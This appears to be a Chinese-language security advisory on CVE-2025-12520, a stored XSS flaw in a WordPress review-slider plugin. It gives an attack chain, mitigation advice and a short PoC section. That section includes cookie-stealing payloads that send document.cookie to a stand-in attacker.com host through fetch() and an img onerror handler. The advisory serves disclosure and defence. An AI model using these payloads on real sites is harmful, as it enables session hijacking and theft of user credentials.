CVE-2025-12520 WordPress WP Airbnb Review Slider 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12520

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

4.0 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

WP Airbnb Review Slider (WordPress插件)

漏洞概述

CVE-2025-12520是WordPress平台下WP Airbnb Review Slider插件的一个存储型跨站脚本(XSS)安全漏洞。该漏洞存在于插件的管理员设置功能中，由于对URL输入验证不充分，攻击者可以引入恶意HTML文件内容。漏洞影响该插件4.2及以下所有版本。攻击者需要具有管理员级别或更高权限，且该漏洞仅影响多站点安装或已禁用unfiltered_html功能的WordPress站点。当恶意脚本被注入后，每当用户访问包含注入内容的页面时，恶意代码就会自动执行，可能导致会话劫持、敏感信息窃取、管理后台被完全控制等严重后果。Wordfence安全团队于2025年11月7日披露此漏洞，建议用户立即更新到4.3或更高版本以修复此安全问题。

技术细节

该漏洞的根本原因在于WP Airbnb Review Slider插件的管理设置页面缺乏对URL参数的充分验证和过滤。攻击者（具有管理员权限）可以在插件的设置选项中输入包含恶意HTML/JavaScript代码的URL地址。当插件从该URL获取并显示内容时，恶意代码会被存储到数据库中。由于缺乏输出时的转义处理，存储的恶意脚本会在其他用户访问相关页面时直接执行。具体利用方式：首先攻击者需要获得WordPress站点管理员账号权限，然后在插件设置中找到一个接受URL输入的字段（如评论来源URL设置），将该字段值替换为指向攻击者控制的恶意HTML文件的URL。该HTML文件中包含<script>标签或其他XSS payload，如：<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>。保存设置后，恶意代码会被永久存储在wp_options或相关数据表中。当前端用户访问使用该插件展示评论的页面时，恶意脚本便会自动执行，窃取用户会话cookie或执行其他恶意操作。此漏洞的利用前提是目标站点为多站点模式或已禁用unfiltered_html，这两种情况下WordPress不会过滤用户输入的原始HTML代码。

攻击链分析

STEP 1

步骤1: 侦察与权限获取

攻击者通过暴力破解、钓鱼攻击或利用其他漏洞获取WordPress站点的管理员账号凭据

STEP 2

步骤2: 访问插件设置页面

以管理员身份登录WordPress后台，导航至WP Airbnb Review Slider插件的设置页面

STEP 3

步骤3: 准备恶意载荷

攻击者在外部服务器上托管包含恶意JavaScript代码的HTML文件，如窃取cookie的脚本

STEP 4

步骤4: 注入恶意URL

在插件的URL输入字段（如评论来源设置）中填入指向恶意HTML文件的URL地址并保存

STEP 5

步骤5: 持久化存储

恶意脚本代码被存储到WordPress数据库的wp_options表或相关配置中，实现持久化

STEP 6

步骤6: 触发执行

当其他用户（管理员或普通用户）访问使用该插件展示评论的页面时，恶意脚本自动执行

STEP 7

步骤7: 窃取敏感信息

恶意脚本窃取用户会话cookie、凭据或执行其他恶意操作，攻击者可进一步控制整个站点

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-12520 PoC: Stored XSS via WP Airbnb Review Slider Admin Settings -->
<!-- attacker-controlled malicious.html hosted on external server -->
<!--
<!DOCTYPE html>
<html>
<head><title>Malicious</title></head>
<body>
<script>
  // Steal admin cookies and send to attacker server
  var stolen = document.cookie;
  fetch('https://attacker.com/log?c=' + encodeURIComponent(stolen));
  // Or perform admin actions
  // fetch('/wp-admin/admin-ajax.php', {method: 'POST', body: 'action=...'})
</script>
</body>
</html>
-->

<!-- Step 1: Authenticate as WordPress Administrator -->
<!-- Step 2: Navigate to WP Airbnb Review Slider Settings -->
<!-- Step 3: Find URL input field (e.g., Review Source URL) -->
<!-- Step 4: Set value to: http://attacker.com/malicious.html -->
<!-- Step 5: Save settings - malicious script is now stored -->
<!-- Step 6: Any user visiting pages with review slider triggers XSS -->

<!-- Example XSS payload for testing: -->
<script>alert('XSS by CVE-2025-12520')</script>

<!-- Or steal session: -->
<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

影响范围

WP Airbnb Review Slider <= 4.2 (所有版本)

防御指南

临时缓解措施

由于该漏洞仅影响多站点WordPress安装或禁用了unfiltered_html的站点，可考虑临时恢复unfiltered_html功能（需谨慎评估风险）。同时应立即将WP Airbnb Review Slider插件升级至4.3版本。如果无法立即更新，可通过Web应用防火墙(WAF)规则阻止对插件设置页面的恶意请求，并限制只有受信任的IP地址可以访问管理后台。检查wp_options表中wp_airbnb_review_slider相关选项是否有异常值，发现恶意代码后立即清除并重置所有用户会话。